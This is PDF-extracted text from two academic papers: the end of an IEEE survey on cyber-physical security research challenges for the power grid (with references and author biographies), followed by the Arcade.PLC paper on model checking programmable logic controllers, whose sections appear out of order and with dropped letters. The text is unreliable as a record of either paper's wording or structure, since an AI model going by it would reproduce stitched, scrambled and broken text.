high-impact contingen-cy scenarios is necessary.Sridhar et al. : Cyber Physical System Security for the Electric Power Grid 220 Proceedings of the IEEE | Vol. 100, No. 1, January 2012 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. Domain-specific anomaly detection and intrusion tolerance algorithms that are able to classify mea- surements and commands as good/bad are key. Inaddition, built-in intelligence is required so thatdevices can respond appropriately to anomalysituations. C. Coordinated Attack Defense The power system, in most cases, is operated at (N-1) contingency condition and can inherently counter attacks that are targeted at single components. This means, theeffect from the loss of a single transmission line can benegated by rerouting power through alternate lines. How-ever, the system was not designed to fend against attacksthat target multiple components. Such coordinated at-tacks, when carefully structured and executed, can pushthe system outside the protection zone. The increased at- tack surface introduced by the smart grid provides an opening for an adversary to plan such attacks. The North American Electric Reliability Corporation (NERC) has instituted the Cyber Attack Task Force(CATF) to gauge system risk from such attacks and de-velop feasible, and cost-effective mitigation techniques[64]. Future mitigation strategies include the following. Risk modeling and mitigation of coordinated attacks is key to preventing the occurrence of attacks. Attack detection tools that monitor traffic andsimultaneously correlate events at multiple sub-stations could help in early identification of coordi-nated attack scenarios. Future power system planning and reliability studies should accommodate coordinated attack scenariosin its scope. Strategic enhancements to the power system infrastructure could help the system operate within stability limits during suchscenarios. D. AMI Security Geographically distribute d architectures with high availability requirements present numerous security andprivacy concerns. Specific research challenges with AMI include: remote attestation of AMI components and tamper detection mechanisms to prevent metermanipulations; exploration of security failures due to common modal failures (e.g., propagating malware, re-motely exploitable vulnerabilities, sharedauthenticators); model-based anomaly methods to determine attacks based on known usage patterns and fraud/attackdetection algorithms; security versus privacy tradeoffs including inference capabilities of consumer habits, anonymizationmechanisms, anonymity concerns from both data-at-rest and data-in-motion perspectives.Numerous additional privacy concerns have been raised within the smart grid; NIST has provided a more com- prehensive review of these concerns [2]. E. Trust Management The dynamic nature for the smart grid will require complex notions of trust to evaluated the acceptability ofsystem inputs/outputs. Dynamic trust distribution with adaptability for evolving threats and likely cybersecurity failures (e.g., exposed authenticator, unpatched systems)and grid emergencies (e.g., cascading failures,natural disasters, personnel issues). Trust management based on data source (e.g., SCADA field device, adjacent utilities) and verifi-cation of trust allocations for low-trust systems(physically unprotected, limited attribution capa- bilities), along with trust verification mechanisms/ algorithms and impact analysis of trust manipula-tion mechanisms. Aggregation of trust with increasing data/ verification sources (e.g., more sensors, correlationswith previous knowledge of grid status) and accu-mulation of trust requirements throughout AMI. F. Attack Attribution Attack attribution will play an important role in deter- rence within the smart grid. Hi gh availability requirements limit the ability to disconnect potential victims within thecontrol network, especially when steeping-stone attackmethods are used. Attribution capabilities within/between controlled networks including AMI, wide area measurement systems, and control networks. Leveraging known information flows, data formats, and packet latencies. Identifying stepping-stone attacks with utility owned/managed infrastructures based on timinganalysis, content inspection, packet marking/logging schemes. Methods to reduce insider threat impacts while maintaining appropriate adaptability in emergency situations such as improved flexibility of autho-rization and authenticatio n or defense-in-depth implementations. G. Data Sets and Validation Research within the smart grid realm requires realistic data and models to assure accurate results and real-world applicability. Data models for SCADA networks, AMI, wide area monitoring networks including communicationprotocols, common information models (CIM),data sources/sinks. Temporal requirements for data (e.g., 4 ms for pro- tective relaying, 1 4 s for SCADA, etc.) and realisticSridhar et al. : Cyber Physical System Security for the Electric Power Grid Vol. 100, No. 1, January 2012 | Proceedings of the IEEE 221 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. data sets of control-loop interactions (e.g., AGC, voltage regulation, substation protection schemes). VI.CONCLUSION A reliable smart grid requires a layered protection ap- proach consisting of a cyber infrastructure which limitsadversary access and resilient power applications that areable to function appropriately during an attack. This work provides an overview of smart grid operation, associated cyber infrastructure and power system controls that di-rectly influence the quality and quantity of power deliv-ered to the end user. The paper identifies the importanceof combining both power application security andsupportinginfrastructure security into the risk assessment process and provides a methodology for impact evaluation. A smart grid control classification is i ntroduced to clearly identify communication technologies and control messages re-quired to support these control functions. Next, a review ofcurrent cyber infrastructure security concerns are pre-sented to both identify possible weaknesses and addresscurrent research efforts. Future smart grid research chal-lenges are then highlighted detailing the cyber physical security relationship within this domain. While this work focuses on the smart grid environment, the general appli-cation and infrastructure framework including many of theresearch concerns will also transition to other criticalinfrastructure domains. h REFERENCES [1] A Systems View of the Modern Grid , National Energy Technology Laboratory (NETL), U.S. Department of Energy (DOE), 2007. [2] NISTIR 7628: Guidelines for Smart Grid Cyber Security , National Institute for Standards and Technology, Aug. 2010. [3] GAO-04-354: Critical Infrastructure Protection Challenges and Efforts to Secure Control Systems , U.S. Government Accountability Office (GAO), Mar. 2004. [4] NERC Critical Infrastructure Protection (CIP) Reliability Standards , North American Electric Reliability Corporation, 2009. [5] N. Falliere, L. Murchu, and E. Chien, BW32.Stuxnet Dossier, Version 1.3, [ Symantec, Nov. 2010. [6] S. Baker, S. Waterman, and G. Ivanov, BCrossfire: Critical infrastructure in the age of cyber war, [McAfee, 2009. [7] GAO-11-117: Electricity Grid Modernization: Progress Being Made on Cybersecurity Guidelines, but Key Challenges Remainto be Addressed , U.S. Government Accountability Office (GAO), Jan. 2011. [8] G. Stoneburner, A. Goguen, and A. Feringa, BNIST SP 800-30: Risk management guide for information technology systems, [National Institute of Standards and Technology, Tech. Rep., Jul. 2002. [9] K. Stouffer, J. Falco, and K. Scarfone, BNIST SP 800-82: Guide to industrial control systems (ICS) security, [National Institute of Standards and Technology, Tech. Rep., Sep. 2008. [10] Common Cybersecurity Vulnerabilities in Industrial Control Systems , Department of Homeland Security (DHS) Control Systems Security Program (CSSP), May 2011. [11] J.-C. Laprie, K. Kanoun, and M. Kaniche, BModelling interdependencies between the electricity and information infrastructures, [inComput. Safety, Reliability, Security , vol. 4680, F. Saglietti and N. Oster, Eds. Berlin, Germany: Springer-Verlag, 2007, pp. 54 67. [12] D. Kundur, X. Feng, S. Liu, T. Zourntos, and K. Butler-Purry, BTowards a framework for cyber attack impact analysis of theelectric smart grid, [inProc. 1st IEEE Int. Conf. Smart Grid Commun. , Oct. 2010, pp. 244 249.[13] C.-W. Ten, G. Manimaran, and C.-C. Liu, BCybersecurity for critical infrastructures: Attack and defense modeling, [IEEE Trans. Syst. Man Cybern. A, Syst. Humans , vol. 40, no. 4, pp. 853 865, Jul. 2010. [14] C.-W. Ten, C.-C. Liu, and G. Manimaran, BVulnerability assessment of cybersecurity for SCADA systems, [IEEE Trans. Power Syst., vol. 23, no. 4, pp. 1836 1846, Nov. 2008. [15] Y.-L. Huang, A. A. Cardenas, S. Amin, Z.-S. Lin, H.-Y. Tsai, and S. Sastry. (2009). Understanding the physical and economic consequences of attacks on control systems.Int. J. Critical Infrastructure Protect. [Online]. 2(3), pp. 73 83. Available: http://www. sciencedirect.com/science/article/pii/ S1874548209000213 [16] C. J. Mozina, M. Reichard, Z. Bukhala, S. Conrad, T. Crawley, J. Gardell, R. Hamilton, I. Hasenwinkle, D. Herbst, L. Henriksen, G. Johnson, P. Kerrigan, S. Khan, G. Kobet, P. Kumar, S. Patel, B. Nelson, D. Sevcik, M. Thompson,J. Uchiyama, S. Usman, P. Waudby, and M. Yalla, BCoordination of generator protection with generator excitation control and generator capability; working group j-5 of the rotating machinery subcommittee, power system relay committee, [inProc. IEEE Power Eng. Soc. General Meeting , Jun. 2007, DOI: 10.1109/PES.2007.386034. [17] GE EX2100 Excitation Systems . [Online]. Available: http://www.ge-mcs.com/ en/generator-control-and-protection/ ex-excitation-systems/ex2100.html [18] ABB 800xA Turbine Governor . [Online]. Available: http://www.abb.com/product/us/9AAC115756.aspx [19] P. Mohajerin Esfahani, M. Vrakopoulou, K. Margellos, J. Lygeros, and G. Andersson,BCyber attack in a two-area power system: Impact identification using reachability, [ inProc. Amer. Control Conf. , Jul. 2010, pp. 962 967. [20] S. Sridhar and G. Manimaran, BData integrity attacks and their impacts on SCADA control system, [inProc. Power Energy Soc. General Meeting , Jul. 2010, DOI: 10.1109/PES.2010. 5590115. [21] L. Mili, T. Van Cutsem, and M. Ribbens-Pavella, BBad data identificationmethods in power system state estimation VA comparative study, [IEEE Power Eng. Rev. , vol. PER-5, no. 11, pp. 27 28, Nov. 1985. [22] A. Monticelli and A. Garcia, BReliable bad data processing for real-time stateestimation, [IEEE Trans. Power Apparat. Syst., vol. PAS-102, no. 5, pp. 1126 1139, May 1983. [23] E. Handschin, F. Schweppe, J. Kohlas, and A. Fiechter, BBad data analysis for power system state estimation, [IEEE Trans. Power Apparat. Syst. , vol. PAS-94, no. 2, pp. 329 337, Mar. 1975. [24] A. Garcia, A. Monticelli, and P. Abreu, BFast decoupled state estimation and bad data processing, [IEEE Trans. Power Apparat. Syst., vol. PAS-98, no. 5, pp. 1645 1652, Sep. 1979. [25] X. Nian-de, W. Shi-ying, and Y. Er-keng, BA new approach for detection and identification of multiple bad data in power system state estimation, [IEEE Trans. Power Apparat. Syst., vol. PAS-101, no. 2, pp. 454 462, Feb. 1982. [26] V. Quintana, A. Simoes-Costa, and M. Mier, BBad data detection and identification techniques using estimation orthogonal methods, [IEEE Trans. Power Apparat. Syst., vol. PAS-101, no. 9, pp. 3356 3364, Sep. 1982. [27] Y. Liu, P. Ning, and M. K. Reiter, BFalse data injection attacks against state estimation in electric power grids, [inProc. 16th ACM Conf. Comput. Commun. Security . New York: ACM, 2009, pp. 21 32. [28] O. Kosut, L. Jia, R. Thomas, and L. Tong, BLimiting false data attacks on power system state estimation, [inProc. 44th Annu. Conf. Inf. Sci. Syst. , Mar. 2010, DOI: 10.1109/CISS.2010.5464816. [29] D. Callaway and I. Hiskens, BDetecting false data injection attacks on DC state estimation, [inProc. 1st Workshop Secure Control Syst. , Apr. 2010. [Online]. Available: https://www.truststc.org/conferences/10/CPSWeek/papers.htm . [30] L. Xie, Y. Mo, and B. Sinopoli, BFalse data injection attacks in electricity markets, [in Proc. 1st IEEE Int. Conf. Smart Grid Commun. , Oct. 2010, pp. 226 231. [31] A. J. Wood and B. F. Wollenberg, Power Generation, Operation and Control, 2nd ed.Sridhar et al. : Cyber Physical System Security for the Electric Power Grid 222 Proceedings of the IEEE |V o l .1 0 0 ,N o .1 ,J a n u a r y2 0 1 2 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. Hoboken, NJ: Wiley-Interscience, Jan. 1996. [Online]. Available: http://www.amazon.com/Power-Generation-Operation-Control- Allen/dp/0471586994 . [32] L. R. Phillips, M. Baca, J. Hills, J. Margulies, B. Tejani, B. Richardson, and L. Weiland, Analysis of Operations and Cyber SecurityPolicies for a System of Cooperating Flexible Alternating Current Transmission System (FACTS) Devices , Dec. 2005. [33] S. Sridhar and G. Manimaran, BData integrity attack and its impacts on voltage controlloop in power grid, [inProc. IEEE Power Energy Soc. General Meeting , Detroit, MI, Jul. 2011. [34] A. Phadke and J. S. Thorp, Synchronized Phasor Measurements and Their Applications . New York: Springer-Verlag, 2008. [35] J. Dagle, BThe North American synchrophasor initiative (NASPI), [inProc. IEEE Power Energy Soc. General Meeting , Jul. 2010, DOI: 10.1109/PES.2010.5590048. [36] J. Weiss, Protecting Industrial Control Systems from Electronic Threats . New York: Momentum Press, May 2010. [37] D. Callaway and I. Hiskens, BAchieving controllability of electric loads, [ Proc. IEEE , vol. 99, no. 1, pp. 184 199, Jan. 2011. [38] Security Profile for Advanced Metering Infrastructure, v2.0 , The Advanced Security Acceleration Project (ASAP-SG), Jun. 2010. [39] R. Anderson and S. Fuloria, BWho controls the off switch? [2010 1st Proc. IEEE Int. Conf. Smart Grid Commun. (SmartGridComm) , pp. 96 101, Oct. 4 6, 2010, DOI: 10.1109/ SMARTGRID.2010.5622026. [Online]. Available: http://ieeexplore.ieee.org/ stamp/stamp.jsp?tp=&arnumber= 5622026&isnumber=5621989 . [40] P. Tsang and S. Smith, BYASIR: A low-latency, high-integrity security retrofit for legacy SCADA systems, [inProc. IFIP TC 11 23rd Int. Inf. Security Conf. , vol. 278, S. Jajodia, P. Samarati, and S. Cimato, Eds. Boston,MA: Springer-Verlag, 2008, pp. 445 459. [41] M. Majdalawieh, F. Parisi-Presicce, and D. Wijesekera, BDNPSec: Distributed network protocol version 3 (DNP3) security framework, [inAdv. Comput., Inf., Syst. Sci., Eng., K. Elleithy, T. Sobh, A. Mahmood, M. Iskander, and M. Karim, Eds. Amsterdam, The Netherlands: Springer-Verlag, 2006, pp. 227 234.[42] I. Fovino, A. Carcano, M. Masera, and A. Trombetta, BDesign and implementation of a secure Modbus protocol, [inCritical Infrastructure Protection III , vol. 311, C. Palmer and S. Shenoi, Eds. Boston, MA: Springer-Verlag, 2009, pp. 83 96. [43] J. T. Michalski, A. Lanzone, J. Trent, and S. Smith, BSAND2007-3345: Secure ICCP Integration Considerations and Recommendations, [Sandia National Laboratories, Jun. 2007. [44] H. Khurana, R. Bobba, T. Yardley, P. Agarwal, and E. Heine, BDesign principles for power grid cyber-infrastructure authentication protocols, [inProc. 43rd Hawaii Int. Conf. Syst. Sci., Washington, DC, 2010, DOI: 10.1109/HICSS.2010.136. [45] R. Chakravarthy, C. Hauser, and D. E. Bakken, BLong-lived authentication protocols for process control systems, [ Int. J. Critical Infrastructure Protect. , vol. 3, no. 3 4, pp. 174 181, 2010. [46] T. Mander, R. Cheung, and F. Nabhani, BPower system DNP3 data object security using data sets, [Comput. Security , vol. 29, no. 4, pp. 487 500, 2010. [47] S. East, J. Butts, M. Papa, and S. Shenoi, BA taxonomy of attacks on the DNP3 protocol, [inCritical Infrastructure Protection III , vol. 311, C. Palmer and S. Shenoi, Eds. Boston, MA: Springer-Verlag, 2009, pp. 67 81. [48] P. Koopman, BEmbedded system security, [ Computer , vol. 37, pp. 95 97, Jul. 2004. [49] M. LeMay and C. A. Gunter, BCumulative attestation kernels for embedded systems, [in Proc. 14th Eur. Conf. Res. Comput. Security . Berlin, Germany: Springer-Verlag, 2009,pp. 655 670. [50] C. Castelluccia, A. Francillon, D. Perito, and C. Soriente, BOn the difficulty of software-based attestation of embedded devices, [inProc. 16th ACM Conf. Comput. Commun. Security , 2009, pp. 400 409. [51] R. Chandia, J. Gonzalez, T. Kilpatrick, M. Papa, and S. Shenoi, BSecurity strategies for SCADA networks, [in Critical Infrastructure Protection , vol. 253, E. Goetz and S. Shenoi, Eds. Boston, MA: Springer-Verlag, 2007, pp. 117 131. [52] L. Briesemeister, S. Cheung, U. Lindqvist, and A. Valdes, BDetection, correlation, visualization of attacks against critical infrastructure systems, [inProc. 8th Annu. Int. Conf. Privacy Security Trust , Aug. 2010, pp. 15 22.[53] R. C. Parks, BSAND2007-7328: Guide to critical infrastructure protection cybervulnerability assessment, [Sandia National Laboratories, Nov. 2007. [54] M. R. Permann and K. Rohde, BCyber assessment methods for SCADA security, [ The Instrumentation, Systems andAutomation Society (ISA), Tech. Rep., 2005. [55] National SCADA Test Bed: Fact Sheet , Idaho National Laboratory (INL), 2007. [56] NSTB Assessments Summary Report: Common Industrial Control System Cyber Security Weaknesses , Idaho National Laboratory (INL), May 2010. [57] M. J. McDonald, G. N. Conrad, T. C. Service, and R. H. Cassidy, BSAND2008-5954: Cyber effects analysis using VCSE, promoting control system reliability, [Sandia National Laboratories, Sep. 2008. [58] A. Hahn, B. Kregel, M. Govindarasu, J. Fitzpatrick, R. Adnan, S. Sridhar, and M. Higdon, BDevelopment of the POWERCYBER SCADA security testbed, [in Proc. 6th Annu. Workshop Cyber Security Inf. Intell. Res. , 2010, pp. 21-1 21-4. [59] D. C. Bergman, D. Jin, D. M. Nicol, and T. Yardley, BThe virtual power system testbed and inter-testbed integration, [inProc. 2nd Workshop Cyber Security Experiment. Test , Aug. 2009, pp. 1 6. [60] S. Cheung, B. Dutertre, M. Fong, U. Lindqvist, S. K., and A. Valdes, BUsing model-based intrusion detection for SCADA networks, [in Proc. SCADA Security Sci. Symp. , Jan. 2007. [61] X. Jin, J. Bigham, J. Rodaway, D. Gamez, and C. Phillips, BAnomaly Detection in Electricity Cyber Infrastructures, [Proc. Int. Workshop CNIP 2006 , 2006. [62] R. Berthier, W. Sanders, and H. Khurana, BIntrusion detection for advanced metering infrastructures: Requirements and architectural directions, [inProc. 1st IEEE Int. Conf. Smart Grid Commun. , Oct. 2010, pp. 350 355. [63] P. Sousa, A. Bessani, M. Correia, N. Neves, and P. Verissimo, BHighly available intrusion-tolerant services with proactive-reactive recovery, [IEEE Trans. Parallel Distrib. Syst. , vol. 21, no. 4, pp. 452 465, Apr. 2010. [64] Scope of Cyber Attack Task Force (CATF) , North American Electric Reliability Corporation, 2011. ABOUT THE AUTHORS Siddharth Sridhar (Student Member, IEEE) re- ceived the B.E. degree in electrical and electronicsengineering from The College of Engineering,Guindy (Anna University), India, in 2004. He is currently working towards the Ph.D. degree in computer engineering at the Department of Elec-trical and Computer Engineering, Iowa StateUniversity, Ames. His research interests are in the application of intelligent cybersecurity methods to power sys-tem monitoring and control. Adam Hahn (Student Member, IEEE) received the B.S. degree in computer science from the Univer-sity of Northern Iowa, Cedar Falls, in 2003 andthe M.S. degree in computer engineering from Iowa State University (ISU), Ames, in 2006, where he is currently working towards the Ph.D. degreeat the Department of Electrical and ComputerEngineering. He is currently an Information Security Engi- neer at the MITRE Corporation and has participat-ed in Institute for Information Infrastructure Protection (I3P) projects. Hisresearch interests include cyber vulnerability assessment, critical infrastructure cybersecurity, and smart grid technologies.Sridhar et al. : Cyber Physical System Security for the Electric Power Grid Vol. 100, No. 1, January 2012 | Proceedings of the IEEE 223 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply. Manimaran Govindarasu (Senior Member, IEEE) received the Ph.D. degree in computer science andengineering from the Indian Institute of Technol- ogy (IIT), Chennai, India, in 1998. He is currently a Professor in the Department of Electrical and Computer Engineering, Iowa State University, Ames, and he has been on the faculty there since 1999. His research expertise isin the areas of network security, real-time em-bedded systems, and cyber physical security of smart grid. He has recently developed cybersecurity testbed for smart grid at Iowa State University to conduct attack defense evaluations anddevelop robust countermeasures. He has coauthored more than 125peer-reviewed research publications.Dr. Govindarasu has given tutorials at reputed conferences (including IEEE INCOFOM 2004 and IEEE ComSoc Tutorials Now )o nt h es u b j e c to f cybersecurity. He has served in technical program committee as chair,vice-chair, and member for many IEEE conferences/workshops, and served as session chair in many conferences. He is a coauthor of the text Resource Management in Real-Time Systems and Networks (Cambridge, MA: MIT Press, 2001). He has served as guest coeditor for several journals including leading IEEE magazines. He has contributed to the U.S DoE NASPInet Specification project and i s currently serving as the chair of the Cyber Security Task Force at IEEE Power and Energy Systems Society(PES) CAMS subcommittee.Sridhar et al. : Cyber Physical System Security for the Electric Power Grid 224 Proceedings of the IEEE | Vol. 100, No. 1, January 2012 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:24 UTC from IEEE Xplore. Restrictions apply.
Arcade.PLC_a_verification_platform_for_programmable_logic_controllers.pdf
This paper introduces Arcade.PLC , a veri cation platform for programmable logic controllers (PLCs). The tool supports static analysis as well as CTL and past-time LTL model checking using counterexample-guided abstraction re nement for di erent programming languages used in industry. In the underlying principles of the framework, knowledge about the hardware platform is exploited so as to provide e cient techniques. The e ectiveness of the approach is evaluated on programs implemented using a combination of programming languages. Categories and Subject Descriptors D.2.4 [ Software Engineering ]: Software/Program Veri - cation Formal methods, Model checking General Terms Veri cation state space, it is also valid in the concrete model; otherwise, we generate a counterexample that can potentially be spurious. This is checked by replaying the counterexample, i. e., repeating the successor-building and following the states comprising the counterexample. If, during replay, there is an ambiguous jump or atomic proposition in the trace which depends on global variables, we store the respective predicates as so-called lemmas . Then, we guard the program with all lemmas, guiding the re nement of the state space similar to control ow determinization. The idea of this approach is that the lemmas are checked at the end of a cycle, where the model checker is still aware of symbolic/relational information (which is not stored in the state space). Restarting model checking until either the formula is valid or we do not nd further lemmas thus eventually resolves over-approximate behavior that leads to spurious counterexamples. If a counterexample is legitimate, i. e., all transitions are possible without relying on further lemmas, it is presented to the user. All transitions are labeled with input values necessary for reaching the destination. Due to abstraction re- nement from above, they typically are maximal in the sense that increasing the set of possible values of a variable would make control ow ambiguous. Thus, the counterexample shows the complete set of failure inducing input. For clarity, inputs containing /latticetop(i. e., irrelevant inputs) are omitted from display. This further aids in debugging erroneous behavior by drawing attention to the relevant inputs. 2.5 Hierarchical Predicate Abstraction In addition, we have developed a predicate abstraction to further reduce the state space. To illustrate the idea, consider a state swhere x=[0,50]and the formula holds. Then, a new state s/primeidentical to sbut with, e.g., x= [7,23], is entailed bys. Thus, s/primedoes not have to be inspected. The key idea to achieve this is to organize the state space in a form that supports e cient entailment checks while still having explicit (though abstract) states. We do so by using predicates which are represented in a tree-structure. Each level in the tree partitions the state space (and so do sub-levels, but the predicates in the di erent levels di er). Entailment checking then amounts to traversing this tree. New predicates are automatically derived from atomic proposition taken from the formula and by analyzing lemmas necessary for counterexamples. In principle the overall idea follows the spirit of OBDD-based approaches, with the exception that we use the leaves of our structure to store the transition relation. As of now, the predicate abstraction is only implemented for checking invariants. 2.6 Static Analysis Finally, Arcade.PLC features a static analysis framework, which also operates on our IR and uses the abstract inter- pretation to: (a) infer range and value-set information about the program variables, (b) perform liveness analysis and (c) perform slicing depending on the formula to be checked. For (a), we use basically the same algorithm for the successorgeneration as the model checker, but rely on the value-set domain to capture more precise information. Instead of build- ing the reachable state space, however, we join the abstract values of all variables for each possible successors state after simulating a cycle. This ensures quick convergence, while still generating valuable range information. 3. EXPERIMENTS This section presents an evaluation of Arcade.PLC on programs of varying complexity written in di erent languages. All experiments where performed on a desktop computer equipped with an Intel Core i5 processor and 16 GiB RAM. Arcade.PLC itself has been implemented in Java . 3.1 Benchmarks The rst collection of ve programs consists of safety- critical FBs de ned by the PLCopen consortium [11] and constitute up to 14 inputs of type Boolean and Integer. They are speci ed in terms of automata, timing diagrams and semi-formal descriptions, while the implementation of the FBs itself is left to the developer. All FBs, irrespective of their implementation language, use the standard library in ST. The speci cations that we checked formalize correctness requirements from the speci cations. The second case study examines programs for controlling conveyor belts using a Siemens SIMATIC S7 PLC. The conveyor belts all operate independently and are controlled with a merely Boolean program using light curtains. In the third case study, we veri ed a controller for a 3D robot, also using a SIMATIC S7. This robot has 3 motors that allow to move its arm in all dimensions, and one motor for its mechanical grab. All motor axes are connected to step counters, which allow the program to count the number of rotations of the respective motors. Since unlimited forth/back and up/down movement is mechanically impossible (and would ultimately destroy the motor), we veri ed that the counters remain within range. This case study was performed with increasing complexity by raising the number on controlled axes. In one case, we altered the formula slightly to provoke a counterexample. 3.2 Evaluation The experimental results using both techniques discussed in this paper are given in Tab. 1. We chose a time-out of 10 minutes for all programs (indicated by ). The table presents the number of states and runtime using both the CE- GAR and the predicate abstraction (PA) approach (checking ptLTL formulae using predicate abstraction is not possible yet, hence the n/ain row 4). Small function blocks as they are used for safety-critical functions are checked with Arcade.PLC in minutes or even seconds. When combining them to larger programs, the time for model checking increases but it is possible to check all programs in reasonable time. It is interesting to observe that CEGAR and hierarchical predicate abstraction can be seen as orthogonal techniques. In any except one case, hierarchical predicate abstraction leads to more compact state spaces using the tree-like state space representation. Depending on the structure of the program, the runtime may increase (cp. Robot), but in other cases it improves performance by a factor of at least 30.340 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:24 UTC from IEEE Xplore. Restrictions apply. Table 1: Evaluation with Arcade.PLC Program Lang. #loc Spec. res.#states time #states time CEGAR CEGAR PA PAPLCOpenSF_Antivalent ST 108 CTL true 45 <1s 5 <1s SF_EmergencyStop IL&ST 226 CTL CE 12 <1s 46 <1s SF_ModeSelector ST 188 CTL true 743 15s 17 <1s SF_ModeSelector ST 188 ptLTL true 710 14s n/a n/a SF_ModeSelector IL&ST 424 CTL true - 45 50s SF_GuardLocking IL&ST 400 CTL true 39,265 45s 3 <1s SF_MutingSeq IL&ST 827 CTL true - 3 151sBelt1 Belt S7 92 CTL true 128 1s 3 <1s 4 Belts S7 323 CTL true 137 7s 3 <1sRobot1 Axis S7 66 CTL true 178 <1s 85 23s 4 Axes S7 102 CTL true 314 4s 85 157s 4 Axes S7 102 CTL CE 178 <1s 86 132s 4. CONCLUSION InArcade.PLC , we have implemented di erent seemingly orthogonal approaches. On the one hand, we account for the speci c hardware platform and its cyclic scanning mode. On the other hand, we made our framework independent from implementation languages by translating them into an IR. Our work thus dovetails with recent work that uses IRs for binaries [1, 3], which aims at providing a generic interface for low-level analyses. Indeed, Arcade.PLC is the rst veri cation tool for PLCs that can handle modules written in di erent languages. Using domain-speci c variants of CEGAR and predicate abstraction, it can verify programs that involve complex control ow and heavy interaction with the environment. 5. ACKNOWLEDGMENTS Sebastian Biallas is supported by the DFG. Further, this work is supported by the DFG Research Training Group 1298 Algorithmic Synthesis of Reactive and Discrete-Continuous Systems (AlgoSyn) and by the DFG Cluster of Excellence on Ultra-high Speed Information and Communication (UMIC), German Research Foundation grant DFG EXC 89. 6. REFERENCES [1] S. Bardin, P. Herrmann, J. Leroux, O. Ly, R. Tabary, and A. Vincent. The BINCOA Framework for Binary Code Analysis. In CAV , pages 165 170, 2011. [2] S. Biallas, J. Brauer, and S. Kowalewski. Counterexample-Guided Abstraction Re nement for PLCs. In SSV, pages 1 9. USENIX, 2010. [3]D. Brumley, I. Jager, T. Avgerinos, and E. J. Schwartz. BAP: A Binary Analysis Platform. In CAV , volume 6806 of LNCS , pages 463 469. Springer, 2011. [4] G. Canet, S. Cou n, J.-J. Lesage, A. Petit, and P. Schnoebelen. Towards the automatic veri cation of PLC programs written in instruction list. In 2000 IEEEInternational Conference on Systems, Man, and Cybernetics, Nashville , volume 4, pages 2449 2454. IEEE Computer Society Press, 2000. [5] V. Gourcu , O. De Smet, and J. M. Faure. E cient representation for formal veri cation of PLC programs. In8th International Workshop on Discrete Event Systems , pages 182 187, 2006. [6] V. Gourcu , O. De Smet, and J.-M. Faure. Improving large-sized PLC programs veri cation using abstractions. In Proceedings of the 17th IFAC World Congress , pages 5101 5106, 2008. [7] International Electrotechnical Commission. IEC 61131-3: Programmable Controllers Part 3 Programming languages . International Electrotechnical Commission, Geneva, Switzerland, 1993. [8]International Electrotechnical Commission. IEC 61508: Functional Safety of Electrical, Electronic and Programmable Electronic Safety-Related Systems . International Electrotechnical Commission, Geneva, Switzerland, 1998. [9] I. Moon. Modeling programmable logic controllers for logic veri cation. IEEE Control Systems Magazine , 14(2):53 59, 1994. [10] O. Pavlovic, R. Pinger, and M. Kollmann. Automated formal veri cation of PLC programms written in IL. In VERIFY , number 259 in Workshop Proce., pages 152 163. CEUR-WS.org, 2007. [11]PLCopen TC5. Safety Software Technical Speci cation, Version 1.0, Part 1: Concepts and Function Blocks . PLCopen, Germany, 2006. [12] M. Rausch and B. Krogh. Formal veri cation of PLC programs. In In Proc. American Control Conference , pages 234 238, 1998. [13]B. Schlich and S. Kowalewski. Model checking C source code for embedded systems. International Journal on Software Tools for Technology Transfer (STTT) , 11(3):187 202, 2009.341 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:24 UTC from IEEE Xplore. Restrictions apply.
Arcade.PLC: A Veri cation Platform for Programmable Logic Controllers Sebastian Biallas Embedded Software Laboratory RWTH Aachen University Aachen, Germany [email protected] aachen.deJ rg Brauer Veri ed Systems International GmbH Bremen, Germany brauer@veri ed.deStefan Kowalewski Embedded Software Laboratory RWTH Aachen University Aachen, Germany [email protected] aachen.de Keywords PLC, static analysis, model checking 1. INTRODUCTION PLCs [7] are control devices mostly used in the automa- tion industry to operate and monitor systems such as power plants and oil rigs. Since failures in such systems may have hazardous e ects on humans or the environment, the ap- plication of formal methods to ensure correctness is highly recommended [8]. Yet, their application remains di cult as ve di erent programming languages have been standard- ized, which can be combined in programs. A PLC typically operates in the cyclic scanning mode , which consists of three phases, each of which is executed atomically: (1) sensing inputs, (2) executing the program, and (3) writing outputs. These particularities necessitate techniques tailored to PLCs. Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for pro t or commercial advantage and that copies bear this notice and the full citation on the rst page. To copy otherwise, to republish, to post on servers or to redistribute to lists, requires prior speci c permission and/or a fee. ASE 12, September 3 7, 2012, Essen, Germany Copyright 12 ACM 978-1-4503-1204-2/12/09 ...$15.00.1.1 Arcade.PLC This paper presents the Arcade.PLC1model checker for PLCs, which supports speci cations in CTL and past- time LTL(ptLTL ). In principle, Arcade.PLC implements the counterexample-guided abstraction re nement (CEGAR) scheme. Yet, we have developed di erent adaptations to account for the hardware platform. To break the depen- dencies between the di erent implementation languages, we rst translate the programs, which consist of a collection of modules, into an intermediate representation (IR). The tool then accounts for the cyclic scanning mode by hiding intermediate states that appear within a cycle, and are thus invisible to the environment. The end-user can specify ob- servable input-output relations, which dovetails with typical speci cations for PLCs. To summarize, Arcade.PLC o ers the following advantages compared to other model checkers: PLC programs are supported natively, i. e., neither manual program transformation nor preprocessing is necessary. It is possible to verify programs composed of modules written in di erent languages, which is typical for real- world PLC implementations. The cyclic operation mode and the atomicity of the phases are exploited by using a symbolic and a non- symbolic abstraction step. 1.2 Related Work The rst work for the formal veri cation of PLC programs goes back to Moon [9], who translated PLC programs written inladder diagram into the input language of the model checker Svm. Similar in spirit are the works of Rausch et al. [12], Canet et al. [4] and Pavlovic et al. [10]. Later, Gourcu et al. explored the veri cation of structured text [5] and abstractions [6]. These approaches have in common that they required a transformation are limited to a subset of languages or language constructs. To the best of our knowledge, Arcade.PLC is the rst tool to combine fully automatic veri cation, e cient abstraction techniques, support for di erent PLC programming languages and a graphical user interface. It emerged from [mc]square [13], a model checker for microcontroller software. 1Aachen Rigorous Code Analysis and Debugging Environ- ment for PLCs 